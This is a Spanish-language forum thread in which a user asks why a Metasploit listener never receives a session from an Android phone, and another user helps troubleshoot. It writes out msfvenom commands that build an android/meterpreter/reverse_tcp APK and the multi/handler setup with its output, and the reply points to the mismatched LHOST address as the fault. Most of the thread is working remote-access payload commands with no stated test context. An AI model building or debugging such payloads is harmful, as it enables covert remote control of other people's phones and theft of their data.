Porque no puedo iniciar el modo escucha en msf? Ayuda

Iniciado por Paya, 25 Septiembre 2017, 11:51 AM

0 Miembros y 1 Visitante están viendo este tema.

Paya

 :-( tal vez pueda parecer un poco tonto pero todo lo hice correctamente y no puedo empezar a escuchar mi android
estoy usando msf en kali linux en virtual box
y solo aparece esto

msf> use multi/handler

msf  exploit(handler) > set payload android/meterpreter/reverse_tcp

msf  exploit(handler) > set LHOST <IP_Escucha> (por ejemplo set LHOST 192.168.5.55)

msf exploit(handler) > set LPORT <Puerto Escucha> (por ejemplo set LPORT 4444)
msf exploit(handler) > exploit
  • Started reverse handler on 192.168.75.35:4444
    msf exploit(handler) >
    y de ahi no pasa....
    agradeceria su ayuda

animanegra

Si nos pones como has configurado el payload que metiste en en el android mejor. Porque hay dos partes, una la del server y otra la del cliente. Aqui estas configurando el servidor, pero como tienes configuado el cliente??

42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.

Paya

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.5.55 LPORT=4444 R> PRUEBA.apk
Y me aparece lo siguiente
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8493 bytes

animanegra

A ver, tengo una duda. ¿Cual es la IP de la maquina servidora y cual la del movil?. Porque donde parece que te esta abriendo el servidor es en la IP 192.168.75.35 segun lo que escribes. Pero arriba pones que en local host estas poniendo la 192.168.5.55.

lhost debe ser la IP del servidor donde ejecutas el metasploit, y debes certificar que el servidor tiene esa IP, en tu caso local.

42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.

Paya

PANTALLA 1
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 R> pruebass.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8811 bytes

PANTALLA 2
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.66
lhost => 192.168.1.66
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
  • Exploit running as background job 0.

  • Started reverse TCP handler on 192.168.1.66:4444
    msf exploit(handler) >

    Y DE AQUI NO PUEDO PASAR... AYUDENME PORFAVOR